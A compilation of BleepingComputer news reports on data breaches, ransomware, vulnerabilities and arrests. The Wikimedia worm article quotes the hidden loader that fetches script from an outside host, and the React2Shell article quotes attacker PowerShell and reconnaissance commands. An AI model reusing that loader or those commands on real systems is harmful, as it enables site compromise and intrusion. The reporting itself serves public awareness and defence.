bleepingcomputer.com
By Sergiu Gatlan
March 9, 2026

Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to over 15,000 employees and customers after hacking one of its service providers.

Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to over 15,000 employees and customers after hacking one of its service providers.

Headquartered in Stockholm and founded in 1876, the parent company is a communications tech leader with nearly 90,000 employees worldwide.

In data breach notification letters sent to affected individuals and filed with the California Attorney General on Monday, Ericsson said that a service provider who was storing personal data for employees and customers discovered a breach on April 28, 2025.

After detecting the incident, the third-party vendor notified the FBI and hired external cybersecurity experts to assess the extent of the breach and its impact.

The investigation, which was completed last month, found that a total of 15,661 individuals had their data exposed in the incident. However, Ericsson noted that the compromised provider has yet to find evidence that the data has been misused since the breach.

"Based on the investigation, our service provider determined that a limited subset of files may have been accessed or acquired without authorization between April 17, 2025 and April 22, 2025," Ericsson said.

"As part of its investigation, it retained external data specialists to conduct a comprehensive review of the potential affected files to identify any personal information. That review was completed on February 23, 2026 at which time we determined that that some of your personal information was contained within the affected files."

According to a separate filing with the Texas Attorney General, the exposed information includes affected individuals' names, addresses, Social Security Numbers, Driver’s License numbers, government-issued ID numbers (e.g., passport, state ID cards), financial Information (e.g., account numbers, credit or debit card numbers), medical Information, and dates of birth.

Ericsson is now providing free IDX identity protection services, including credit monitoring, dark web monitoring, identity theft recovery, and a $1 million identity fraud loss reimbursement policy to affected people who enroll by June 9, 2026.

Although the company flagged this incident as a data theft attack, no cybercrime group has taken responsibility for the breach. This raises the possibility that either the third-party vendor paid the ransom demanded by the attackers or that the threat actors were unable to connect the breach to Ericsson.

When BleepingComputer reached out for more details on the breach, including the total number of affected individuals, an Ericcson spokesperson said they didn't have "anything to share beyond the letter."

Update March 10, 06:39 EDT: In a filing with Maine's Attorney General, Ericsson says the breach affects a total of 15,661 individuals.

bleepingcomputer.com
By Sergiu Gatlan
March 12, 2026

Data protection company Veeam Software has patched multiple flaws in its Backup & Replication solution, including four critical remote code execution (RCE) vulnerabilities.

VBR is enterprise data backup and recovery software that helps IT administrators to create copies of critical data for quick restoration following cyberattacks and hardware failures.

Three RCE security flaws patched today (tracked as CVE-2026-21666, CVE-2026-21667, and CVE-2026-21669) allow low-privileged domain users to execute remote code on vulnerable backup servers in low-complexity attacks.

The fourth one (tracked as CVE-2026-21708) allows a Backup Viewer to gain remote code execution as the postgres user.

Veeam also addressed several high-severity security bugs that can be exploited to escalate privileges on Windows-based Veeam Backup & Replication servers, extract saved SSH credentials, and bypass restrictions to manipulate arbitrary files on a Backup Repository.

These vulnerabilities were discovered during internal testing or reported through HackerOne and are resolved in Veeam Backup & Replication versions 12.3.2.4465 and 13.0.1.2067.

Veeam also warned admins to upgrade the software to the latest release as soon as possible, since threat actors often begin developing exploits shortly after patches are released.

"It's important to note that once a vulnerability and its associated patch are disclosed, attackers will likely attempt to reverse-engineer the patch to exploit unpatched deployments of Veeam software," the company warned. "This reality underscores the critical importance of ensuring that all customers use the latest versions of our software and install all updates and patches without delay."

VBR servers targeted in ransomware attacks
VBR is popular among managed service providers and mid-sized to large enterprises, even though ransomware gangs commonly target VBR servers because they can serve as a quick jumping-off point for lateral movement within breached networks, simplify data theft, and make it easy to block restoration efforts by deleting victims' backups.

The financially motivated FIN7 threat group (which previously collaborated with the Conti, REvil, Maze, Egregor, and BlackBasta ransomware groups) and the Cuba ransomware gang have both been linked to past attacks targeting VBR vulnerabilities.

Sophos X-Ops incident responders also revealed in November 2024 that Frag ransomware exploited another VBR RCE bug disclosed two months earlier and also used in Akira and Fog ransomware attacks starting in October 2024.

Veeam says its products are used by more than 550,000 customers worldwide, including 74% of Global 2,000 firms and 82% of Fortune 500 companies.

bleepingcomputer.com
March 5, 2026
By Lawrence Abrams

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis.
Update: Added Wikimedia Foundation's statement below and made a correction to denote it was only the Meta-Wiki that was vandalized.

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began modifying user scripts and vandalizing Meta-Wiki pages.

Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages.

Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes.

The JavaScript worm
According to Wikimedia's Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code.

The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects.

Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account.

BleepingComputer's review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user's common.js and Wikipedia's global MediaWiki:Common.js, which is used by everyone.

MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User:<username>/common.js, which are executed in editors’ browsers to customize the wiki interface.

After the initial test.js script was loaded in a logged-in editor's browser, it attempted to modify two scripts using that editor's session and privileges:

User-level persistence: it tried to overwrite User:<username>/common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in.
Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script.

Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
Source: BleepingComputer
If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below.

A Wikimedia user's infected common.js script
A Wikimedia user's infected common.js script
Source: BleepingComputer
The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader.

[[File:Woodpecker10.jpg|5000px]]
<span style="display:none">
[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>
According to BleepingComputer's analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted.

Pages modified by JavaScript worm
Pages modified by JavaScript worm
Source: BleepingComputer
As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts.

During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been "supressed" and are no longer visible in the change histories.

At the time of writing, the injected code has been removed, and editing is once again possible.

However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained.

Update 3/5/26 7:45 PM ET: The Wikimedia Foundation shared the following statement with BleepingComputer, stating that the code was active for only 23 minutes, during which it only changed and deleted content on Meta-Wiki, which has since been restored.

"Earlier today, Wikimedia Foundation staff were conducting a security review of user-authored code on Wikipedia. During that review, we activated dormant code that was then quickly identified to be malicious. As a preventative measure, we temporarily disabled editing on Wikipedia and other Wikimedia projects while we removed the malicious code and confirmed the website was safe for user activity. The security issue behind this disruption has now been resolved.

The code was active for a 23 minute period. During that time, it changed and deleted content on Meta-Wiki – which is now being restored – but it did not cause permanent damage. We have no evidence that Wikipedia was under attack, or that personal information was breached as part of this incident. We are developing additional security measures to minimize the risk of this kind of incident happening again. Updates continue to be made available via the Foundation's public incident log."

bleepingcomputer.com
By Bill Toulas
March 3, 2026

The multinational Dutch paint company AkzoNobel has confirmed to BleepingComputer that hackers breached the network of one of its U.S. sites.

Following a data leak from the Anubis ransomware gang, a company spokesperson said that the intrusion has been contained and that the impact is limited.

“AkzoNobel has identified a security incident at one of our sites in the United States. The incident was limited to the respective site and was already contained,” the company told BleepingComputer.

“The impact is limited, and we are taking the appropriate steps to notify and support impacted parties, and will work closely with relevant authorities.”

AkzoNobel is a major paints and coatings company with 35,000 employees. It has an annual revenue exceeding $12 billion and active operations in over 150 countries. Brands under its corporate umbrella include Dulux, Sikkens, International, and Interpon.

Anubis ransomware claims to have stolen from AkzoNobel 170GB of data, almost 170,000 files, and leaked on its leak site samples that include screenshots of select documents and a list of the stolen files.

The published data contains confidential agreements with high-profile clients, email addresses and phone numbers, private email correspondence, passport scans, material testing documents, and internal technical specification sheets.

At the time of writing, the Anubis leak is only partial. AkzoNobel did not share with BleepingComputer any information on whether it engaged with the threat actor.

Anubis is a ransomware-as-a-service (RaaS) operation that launched in December 2024, offering affiliates 80% of the paid ransoms.

In February 2025, the operators launched an affiliate program on the RAMP forum, boosting its activity and influence in the cybercrime space.

In June the same year, Anubis added to its arsenal a data wiper that destroys the victim’s files to make recovery impossible.

bleepingcomputer.com
By Lawrence Abrams
January 28, 2026

The FBI has seized the notorious RAMP cybercrime forum, a platform used to advertise a wide range of malware and hacking services, and one of the few remaining forums that openly allowed the promotion of ransomware operations.

Both the forum's Tor site and its clearnet domain, ramp4u[.]io, now display a seizure notice stating, "The Federal Bureau of Investigation has seized RAMP."

"This action has been taken in coordination with the United States Attorney's Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice," the notice reads.

The seizure banner also appears to taunt the forum's operators by displaying RAMP's own slogan: "THE ONLY PLACE RANSOMWARE ALLOWED!," followed by a winking Masha from the popular Russian "Masha and the Bear" kid's cartoon.

While there has been no official announcement by law enforcement regarding this seizure, the domain name servers have now been switched to those used by the FBI when seizing domains:

Name Server: ns1.fbi.seized.gov
Name Server: ns2.fbi.seized.gov
If so, law enforcement now has access to a significant amount of data tied to the forum's users, including email addresses, IP addresses, private messages, and other potentially incriminating information.

For threat actors who failed to follow proper operational security (opsec), this could lead to identification and arrests.

In a forum post to the XSS hacking forum, one of the alleged former RAMP operators known as "Stallman" confirmed the seizure.

"I regret to inform you that law enforcement has seized control of the Ramp forum," reads the translated forum post.

"This event has destroyed years of my work building the freest forum in the world, and while I hoped this day would never come, I always knew in my heart it was possible. It's a risk we all take.

BleepingComputer contacted the FBI with question regarding the seizure but they declined to comment.

The RAMP cybercrime forum
The RAMP cybercrime forum launched in July 2021, following the banning of the promotion of ransomware operations by popular Russian-speaking Exploit and XSS hacking forums.

This ban was due to heightened pressure from Western law enforcement following the DarkSide ransomware attack on Colonial Pipeline.

Exploit banning ransomware promotion
Exploit banning ransomware promotion
In July 2021, a new Russian-speaking forum called RAMP launched, promoting itself as one of the last remaining places where ransomware could be openly promoted. This led to multiple ransomware gangs using the forum to promote their operations, recruit affiliates, and buy and sell access to networks.

RAMP was launched by a threat actor known as Orange, who also operated under the aliases Wazawaka and BorisElcin.

Orange was previously the administrator of the Babuk ransomware operation, which shut down after its ransomware attack on the D.C. Metropolitan Police Department.

Internal disputes allegedly erupted within the group over whether stolen law enforcement data should be publicly leaked, and after the data was leaked, the group splintered.

Following the split, Orange launched the RAMP forum on a Tor onion domain that Babuk had previously used.

Soon after its launch, RAMP experienced distributed denial-of-service (DDoS) attacks that disrupted its availability. Orange publicly blamed former Babuk partners for the attacks, though the previous members denied responsibility to BleepingComputer, stating they had no interest in the forum.

The individual behind the Orange and Wazawaka aliases was later publicly identified by cybersecurity journalist Brian Krebs as Russian national Mikhail Matveev.

In an interview with Recorded Future's Dmitry Smilyanets, Matveev confirmed that he previously operated under the alias Orange and that he created RAMP using the former Babuk onion domain.

Matveev explained that the forum was initially created to repurpose Babuk's existing infrastructure and traffic. He claimed that RAMP ultimately generated no profit and was subjected to constant DDoS attacks, which led him to step away from managing it after it gained popularity.

In 2023, Matveev was indicted by the U.S. Department of Justice for his involvement in multiple ransomware operations, including Babuk, LockBit, and Hive, which targeted U.S. healthcare organizations, law enforcement agencies, and other critical infrastructure.

He was also sanctioned by the U.S. Treasury's Office of Foreign Assets Control and placed on the FBI's most-wanted list, with the U.S. State Department offering a reward of up to $10 million for information leading to his arrest or conviction.

bleepingcomputer.com
By Sergiu Gatlan
January 21, 2026 12:49 PM

Fortinet customers are seeing attackers exploiting a patch bypass for a previously fixed critical FortiGate authentication vulnerability (CVE-2025-59718) to hack patched firewalls.

Fortinet customers are seeing attackers exploiting a patch bypass for a previously fixed critical FortiGate authentication vulnerability (CVE-2025-59718) to hack patched firewalls.

One of the affected admins said that Fortinet has allegedly confirmed that the latest FortiOS version (7.4.10) didn't fully address this authentication bypass vulnerability, which should've been patched in early December with the release of FortiOS 7.4.9.

Fortinet is also reportedly planning to release FortiOS 7.4.11, 7.6.6, and 8.0.0 over the coming days to fully patch the security flaw.

"We just had a malicious SSO login on one of our FortiGate's running on 7.4.9 (FGT60F). We have a SIEM that caught the local admin account being created. Now, I have done a little research, and it appears this is exactly how it looked when someone came in on CVE-2025-59718. But we have been on 7.4.9 since December 30th," the admin said.

The customer shared logs showing that the admin user was created from an SSO login of cloud-init@mail.io from IP address 104.28.244.114. These logs looked similar to previous exploitation of CVE-2025-59718 seen by cybersecurity company Arctic Wolf in December 2025, which reported that attackers were actively exploiting the vulnerability via maliciously crafted SAML messages to compromise admin accounts.

"We observed the same activity. Also running 7.4.9. Same user login and IP address. Created a new system admin user named "helpdesk". We have an open ticket with support. Update: The Fortinet developer team has confirmed the vulnerability persists or is not fixed in v7.4.10," another one added.

BleepingComputer reached out to Fortinet multiple times this week with questions about these reports, but the company has yet to reply.

Until Fortinet provides a fully patched FortiOS release, admins are advised to temporarily disable the vulnerable FortiCloud login feature (if enabled) to secure their systems against attacks.

To disable FortiCloud login, you have to navigate to System -> Settings and switch "Allow administrative login using FortiCloud SSO" to Off. However, you can also run the following commands from the command-line interface:

config system global
set admin-forticloud-sso-login disable
end
Luckily, as Fortinet explains in its original advisory, the FortiCloud single sign-on (SSO) feature targeted in the attacks is not enabled by default when the device is not FortiCare-registered, which should reduce the total number of vulnerable devices.

However, Shadowserver still found over 25,000 Fortinet devices exposed online with FortiCloud SSO enabled in mid-December. At the moment, more than half have been secured, with Shadowserver now tracking just over 11,000 that are still reachable over the Internet.

CISA has also added the CVE-2025-59718 FortiCloud SSO auth bypass flaw to its list of actively exploited vulnerabilities, ordering federal agencies to patch within a week.

Hackers are now also actively exploiting a critical Fortinet FortiSIEM vulnerability with publicly available proof-of-concept exploit code that can enable them to gain code execution with root privileges on unpatched devices.

bleepingcomputer.com
By Lawrence Abrams
January 15, 2026

Exclusive: Food delivery platform Grubhub has confirmed a recent data breach after hackers accessed its systems, with sources telling BleepingComputer the company is now facing extortion demands.

"We're aware of unauthorized individuals who recently downloaded data from certain Grubhub systems," Grubhub told BleepingComputer.

"We quickly investigated, stopped the activity, and are taking steps to further increase our security posture. Sensitive information, such as financial information or order history, was not affected."

Grubhub would not respond to any further questions regarding the breach, including when it occurred, whether customer data was involved, or if they were being extorted.

However, the company confirmed that it is working with a third-party cybersecurity firm and has notified law enforcement.

Last month, Grubhub was also linked to a wave of scam emails sent from its b.grubhub.com subdomain that promoted a cryptocurrency scam promising a tenfold return on Bitcoin payments.

Grubhub said at the time that it contained the issue and took steps to prevent further unauthorized messages, but would not answer further questions related to the incident.

It is unclear if the two incidents are connected.

Extorted by hackers
While Grubhub would not share further details, multiple sources have told BleepingComputer that the ShinyHunters cybercrime group is extorting the company.

BleepingComputer attempted to verify these claims with the threat actors, but they refused to comment.

According to sources, the threat actors are demanding a Bitcoin payment to prevent the release of older Salesforce data from a February 2025 breach and newer Zendesk data that was stolen in the recent breach.

Grubhub uses Zendesk to power its online support chat system, which provides support for orders, account issues, and billing.

While it is unclear when the breach occurred, BleepingComputer was told that it was through secrets/credentials stolen in the recent Salesloft Drift data theft attacks.

In August, threat actors used stolen OAuth tokens for Salesloft's Salesforce integration to conduct a data theft campaign between August 8 and August 18, 2025.

According to a report by Google's Threat Intelligence team (Mandiant), the stolen data was then used to harvest credentials and secrets to conduct follow-up attacks on other platforms.

"GTIG observed UNC6395 targeting sensitive credentials such as Amazon Web Services (AWS) access keys (AKIA), passwords, and Snowflake-related access tokens," reports Google.

ShinyHunters claimed at the time to be behind the breach, stating they stole approximately 1.5 billion data records from the "Account", "Contact", "Case", "Opportunity", and "User" Salesforce object tables for 760 companies.

As threat actors continue to abuse previously stolen Salesforce data to carry out follow-on attacks, organizations impacted by the Salesloft Drift breaches must rotate all affected access tokens and secrets as soon as possible if they have not already done so.

bleepingcomputer.com
By Sergiu Gatlan
January 5, 2026

NordVPN denied allegations that its internal Salesforce development servers were breached, saying that cybercriminals obtained "dummy data" from a trial account on a third-party automated testing platform.

The company's statement comes after a threat actor (using the 1011 handle) claimed on a hacking forum over the weekend that they stole more than 10 databases containing sensitive information like Salesforce API keys and Jira tokens, following a brute-force attack against a NordVPN development server.

"Today i am leaking +10 DB's source codes from a nordvpn development server. This information was acquired by bruteforcing a misconfigured server of Nordypn, which has salesforce and jira information stored. Compromissed information: SalesForce api keys, jira tokens and more," the threat actor said.

However, as NordVPN revealed today, this is actually test data stolen from a temporary test environment deployed months earlier during trial testing a potential vendor for automated testing.

The Lithuanian VPN service added that the test environment had no connection with its own infrastructure and that the stolen data doesn't include sensitive customer or business information.

​"The leaked elements, such as the specific API tables and database schemas can only be artifacts of an isolated third-party test environment, containing only dummy data used for functionality checks. While no data in the dump points to NordVPN, we have contacted the vendor for additional information," NordVPN explained.

"Because this was a preliminary test and no contract was ever signed, no real customer data, production source code, or active sensitive credentials were ever uploaded to this environment.

"We ultimately chose a different vendor and did not proceed with the one we tested. The environment in question was never connected to our production systems."

While this was only a false alarm, in 2019, hackers breached the servers of NordVPN and TorGuard, gaining full root access and stealing private keys used to secure their web servers and VPN configurations.

In response to the 2019 incident, NordVPN introduced a bug bounty program and hired outside cybersecurity experts for a "full-scale" third-party security audit.

The company also announced plans to switch to dedicated servers that they own exclusively and to upgrade their entire 5,100-server infrastructure to RAM servers.

bleepingcomputer.com
By Sergiu Gatlan
December 30, 2025

Two former employees of cybersecurity incident response companies Sygnia and DigitalMint have pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.
Two former employees of cybersecurity incident response companies Sygnia and DigitalMint have pleaded guilty to targeting U.S. companies in BlackCat (ALPHV) ransomware attacks in 2023.

33-year-old Ryan Clifford Goldberg of Watkinsville, Georgia (in federal custody since September 2023), and 28-year-old Kevin Tyler Martin of Roanoke, Texas, who were charged in November, have now pleaded guilty to conspiracy to obstruct commerce by extortion and are set to be sentenced on March 12, 2026, facing up to 20 years in prison each.

Together with a third accomplice, the two BlackCat ransomware affiliates breached the networks of multiple victims across the United States between May 2023 and November 2023, paying a 20% share of ransoms in exchange for access to BlackCat's ransomware and extortion platform.

Goldberg is a former Sygnia incident response manager, and Martin worked at DigitalMint as a ransomware threat negotiator (just as the unnamed co-conspirator).

"These defendants used their sophisticated cybersecurity training and experience to commit ransomware attacks — the very type of crime that they should have been working to stop," said Assistant Attorney General A. Tysen Duva. "Extortion via the internet victimizes innocent citizens every bit as much as taking money directly out of their pockets."

According to court documents, their alleged victims include a Maryland pharmaceutical company, a California engineering firm, a Tampa medical device manufacturer, a Virginia drone manufacturer, and a California doctor's office.

While they have demanded ransoms ranging from $300,000 to $10 million, prosecutors said they were only paid $1.27 million by the Tampa medical device company after encrypting its servers and demanding $10 million in May 2023. While other victims also received ransom demands, the indictment does not indicate whether additional payments were made.

As BleepingComputer previously reported, the Justice Department was also investigating a former DigitalMint negotiator in July for allegedly working with ransomware groups. However, the DOJ and FBI did not comment on the investigation, and it is unclear if this case is related to it.

In December 2023, the FBI created a decryption tool after breaching BlackCat's servers to monitor their activities and obtain decryption keys. The FBI also found that the BlackCat operation collected at least $300 million in ransom payments from more than 1,000 victims until September 2023.

In a February 2024 joint advisory, the FBI, CISA, and the Department of Health and Human Services (HHS) also warned that Blackcat affiliates were primarily targeting organizations in the U.S. healthcare sector.

bleepingcomputer.com
By Bill Toulas
December 19, 2025

The Nigerian police have arrested three individuals linked to targeted Microsoft 365 cyberattacks via Raccoon0365 phishing-as-a-service.

The attacks led to business email compromise, data breaches, and financial losses affecting organizations worldwide.

The law enforcement operation was possible thanks to intelligence from Microsoft, shared with the Nigeria Police Force National Cybercrime Centre (NPF–NCCC) via the FBI.

The authorities identified individuals who administered the phishing toolkit ‘Raccoon0365,’ which automated the creation of fake Microsoft login pages for credential theft.

The service, which was responsible for at least 5,000 Microsoft 365 account compromises across 94 countries, was disrupted by Microsoft and Cloudflare last September.

It is unclear if the disruption operation helped identify those behind Raccoon0365 in Nigeria.

BleepingComputer contacted Microsoft for clarifications but a comment wasn't immediately available.

“Acting on precise and actionable intelligence, NPF–NCCC operatives were deployed to Lagos and Edo States, leading to the arrest of three suspects,” reads the police’s announcement.

“Search operations conducted at their residences resulted in the recovery of laptops, mobile devices, and other digital equipment, which have been linked to the fraudulent scheme after forensic analysis.”

One of the arrested suspects is an individual named Okitipi Samuel, also known online as “RaccoonO365” and “Moses Felix,” whom the police believe is the developer of the phishing platform.

Samuel operated a Telegram channel where he sold phishing kits to other cybercriminals in exchange for cryptocurrency, while he also hosted the phishing pages on Cloudflare using accounts registered with compromised credentials.

The Telegram channel counted over 800 members around the time of the disruption, and the reported access fees ranged from $355/month to $999/3 months.

Cloudflare estimates that the service is used primarily by Russia-based cybercriminals.

Regarding the other two arrested individuals, the police stated they have no evidence linking them to the Raccoon0365 operation or creation.

The person that Microsoft previously identified as the leader of the phishing service, Joshua Ogundipe, is not mentioned in the police’s announcement.

bleepingcomputer.com
By Lawrence Abrams
December 6, 2025

Over 77,000 Internet-exposed IP addresses are vulnerable to the critical React2Shell remote code execution flaw (CVE-2025-55182), with researchers now confirming that attackers have already compromised over 30 organizations across multiple sectors.

React2Shell is an unauthenticated remote code execution vulnerability that can be exploited via a single HTTP request and affects all frameworks that implement React Server Components, including Next.js, which uses the same deserialization logic.

React disclosed the vulnerability on December 3, explaining that unsafe deserialization of client-controlled data inside React Server Components enables attackers to trigger remote, unauthenticated execution of arbitrary commands.

Developers are required to update React to the latest version, rebuild their applications, and then redeploy to fix the vulnerability.

On December 4, security researcher Maple3142 published a working proof-of-concept demonstrating remote command execution against unpatched servers. Soon after, scanning for the flaw accelerated as attackers and researchers began using the public exploit with automated tools.

Over 77,000 vulnerable IP addresses
Shadowserver Internet watchdog group now reports that it has detected 77,664 IP addresses vulnerable to the React2Shell flaw, with approximately 23,700 in the United States.

The researchers determined that IP addresses were vulnerable using a detection technique developed by Searchlight Cyber/Assetnote, where an HTTP request was sent to servers to exploit the flaw, and a specific response was checked to confirm whether a device was vulnerable.

GreyNoise also recorded 181 distinct IP addresses attempting to exploit the flaw over the past 24 hours, with most of the traffic appearing automated. The researchers say the scans are primarily originating from the Netherlands, China, the United States, Hong Kong, and a small number of other countries.

Palo Alto Networks reports that more than 30 organizations have already been compromised through the React2Shell flaw, with attackers exploiting the vulnerability to run commands, conduct reconnaissance, and attempt to steal AWS configuration and credential files.

These compromises include intrusions linked to known state-associated Chinese threat actors.

Widespread exploitation of React2Shell
Since its disclosure, researchers and threat intelligence companies have observed widespread exploitation of the CVE-2025-55182 flaw.

GreyNoise reports that attackers frequently begin with PowerShell commands that perform a basic math function to confirm the device is vulnerable to the remote code execution flaw.

These tests return predictable results while leaving minimal signs of exploitation:

powershell -c "4013841979"
powershell -c "4032043488"
Once remote code execution was confirmed, attackers were seen executing base64-encoded PowerShell commands that download additional scripts directly into memory.

powershell -enc <base64>
One observed command executes a second-stage PowerShell script from the external site (23[.]235[.]188[.]3), which is used to disable AMSI to bypass endpoint security and deploy additional payloads.

According to VirusTotal, the PowerShell script observed by GreyNoise installs a Cobalt Strike beacon on the targeted device, giving threat actors a foothold on the network.

Amazon AWS threat intelligence teams also saw rapid exploitation hours after the disclosure of the React CVE-2025-55182 flaw, with infrastructure associated with China-linked APT hacking groups known as Earth Lamia and Jackpot Panda.

In this exploitation, the threat actors perform reconnaissance on vulnerable servers by using commands such as whoami and id, attempting to write files, and reading /etc/passwd.

Palo Alto Networks also observed similar exploitation, attributing some of it to UNC5174, a Chinese state-sponsored threat actor believed to be tied to the Chinese Ministry of State Security.

"Unit 42 observed threat activity we assess with high confidence is consistent with CL-STA-1015 (aka UNC5174), a group suspected to be an initial access broker with ties to the Chinese Ministry of State Security," Justin Moore, Senior Manager at Palo Alto Networks Unit 42, told BleepingComputer via email.

"In this activity, we observed the deployment of Snowlight and Vshell malware, both highly consistent with Unit 42 knowledge of CL-STA-1015 (also known as UNC5174)."

The deployed malware in these attacks is:

Snowlight: A malware dropper that allows remote attackers to drop additional payloads on breached devices.
Vshell: A backdoor commonly used by Chinese hacking groups for remote access, post-exploitation activity, and to move laterally through a compromised network.
The rush to patch
Due to the severity of the React flaw, companies worldwide have rushed to install the patch and apply mitigations.

Yesterday, Cloudflare rolled out emergency detections and mitigations for the React flaw in its Web Application Firewall (WAF) due to its widespread exploitation and severity.

However, the update inadvertently caused an outage affecting numerous websites before the rules were corrected.

CISA has also added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by December 26, 2025, under Binding Operational Directive 22-01.

Organizations using React Server Components or frameworks built on top of them are advised to apply updates immediately, rebuild and redeploy their applications, and review logs for signs of PowerShell or shell command execution.

bleepingcomputer.com
By Bill Toulas
December 1, 2025

The popular open-source SmartTube YouTube client for Android TV was compromised after an attacker gained access to the developer's signing keys, leading to a malicious update being pushed to users.

The compromise became known when multiple users reported that Play Protect, Android's built-in antivirus module, blocked SmartTube on their devices and warned them of a risk.

The developer of SmartTube, Yuriy Yuliskov, admitted that his digital keys were compromised late last week, leading to the injection of malware into the app.

Yuliskov revoked the old signature and said he would soon publish a new version with a separate app ID, urging users to move to that one instead.

SmartTube is one of the most widely downloaded third-party YouTube clients for Android TVs, Fire TV sticks, Android TV boxes, and similar devices.

Its popularity stems from the fact that it is free, can block ads, and performs well on underpowered devices.

A user who reverse-engineered the compromised SmartTube version number 30.51 found that it includes a hidden native library named libalphasdk.so [VirusTotal]. This library does not exist in the public source code, so it is being injected into release builds.

"Possibly a malware. This file is not part of my project or any SDK I use. Its presence in the APK is unexpected and suspicious. I recommend caution until its origin is verified," cautioned Yuliskov on a GitHub thread.

The library runs silently in the background without user interaction, fingerprints the host device, registers it with a remote backend, and periodically sends metrics and retrieves configuration via an encrypted communications channel.

All this happens without any visible indication to the user. While there's no evidence of malicious activity such as account theft or participation in DDoS botnets, the risk of enabling such activities at any time is high.

Although the developer announced on Telegram the release of safe beta and stable test builds, they have not reached the project's official GitHub repository yet.

Also, the developer has not provided full details of what exactly happened, which has created trust issues in the community.

Yuliskov promised to address all concerns once the final release of the new app is pushed to the F-Droid store.

Until the developer transparently discloses all points publicly in a detailed post-mortem, users are recommended to stay on older, known-to-be-safe builds, avoid logging in with premium accounts, and turn off auto-updates.

Impacted users are also recommended to reset their Google Account passwords, check their account console for unauthorized access, and remove services they don't recognize.

At this time, it is unclear exactly when the compromise occurred or which versions of SmartTube are safe to use. One user reported that Play Protect doesn't flag version 30.19, so it appears safe.

BleepingComputer has contacted Yuliskov to determine which versions of the SmartTube app were compromised, and he responded with the following:

"Some of the older builds that appeared on GitHub were unintentionally compromised due to malware present on my development machine at the time they were created. As soon as I noticed the issue in late November, I immediately wiped the system and cleaned the environment, including the GitHub repository."

"I became aware of the malware issue around version 30.47, but as users reported lately it started around version 30.43. So, for my understanding the compromised versions are: 30.43-30.47."

"After cleaning the environment, a couple of builds were released using the previous key (prepared on the clean system), but from version 30.55 onward I switched to a new key for full security. The differing hashes for 30.47 Stable v7a are likely the result of attempts to restore that build after cleaning the infected system."

Update 12/2 - Added developer comment and information.

bleepingcomputer.com
By Bill Toulas
November 20, 2025

Data from Italy's national railway operator, the FS Italiane Group, has been exposed after a threat actor breached the organization's IT services provider, Almaviva.

The hacker claims to have stolen 2.3 terabytes of data and leaked it on a dark web forum. According to the threat actor's description, the leak includes confidential documents and sensitive company information.

Almaviva is a large Italian company that operates globally, providing services such as software design and development, system integration, IT consulting, and customer relationship management (CRM) products.

Andrea Draghetti, Head of Cyber Threat Intelligence at D3Lab, says the leaked data is recent, and includes documents from the third quarter of 2025. The expert ruled out the possibility that the files were recycled from a Hive ransomware attack in 2022.

"The threat actor claims the material includes internal shares, multi-company repositories, technical documentation, contracts with public entities, HR archives, accounting data, and even complete datasets from several FS Group companies," Draghetti says.

"The structure of the dump, organized into compressed archives by department/company, is fully consistent with the modus operandi of ransomware groups and data brokers active in 2024–2025," the cybersecurity expert added.

Almaviva is a major IT services provider with over 41,000 employees across almost 80 branches in Italy and abroad, and an annual turnover of $1.4 billion last year.

FS Italiane Group (FS) is a 100% state-owned railway operator and one of the largest industrial companies in the country, with more than $18 billion in annual revenue. It manages railway infrastructure, passenger and freight rail transport, and also bus services and logistics chains.

While BleepingComputer’s press requests to both Almaviva and FS went unanswered, the IT firm eventually confirmed the breach via a statement to local media.

“In recent weeks, the services dedicated to security monitoring identified and subsequently isolated a cyberattack that affected our corporate systems, resulting in the theft of some data,” Almaviva said.

“Almaviva immediately activated security and counter-response procedures through its specialized team for this type of incident, ensuring the protection and full operability of critical services.”

The company also stated that it has informed authorities in the country, including the police, the national cybersecurity agency, and the country’s data protection authority. An investigation into the incident is ongoing with help and guidance from government agencies.

Almaviva promised to transparently provide updates as more information emerges from the investigation.

Currently, it is unclear if passenger information is present in the data leak or if the data breach is impacting other clients beyond FS.

BleepingComputer has contacted Almaviva with additional questions, but we have not received a response by publication time.

bleepingcomputer.com
By Sergiu Gatlan
November 21, 2025

American cybersecurity firm CrowdStrike has confirmed that an insider shared screenshots taken on internal systems with hackers after they were leaked on Telegram by the Scattered Lapsus$ Hunters threat actors.

However, the company noted that its systems were not breached as a result of this incident and that customers' data was not compromised.

"We identified and terminated a suspicious insider last month following an internal investigation that determined he shared pictures of his computer screen externally," a CrowdStrike spokesperson told BleepingComputer today.

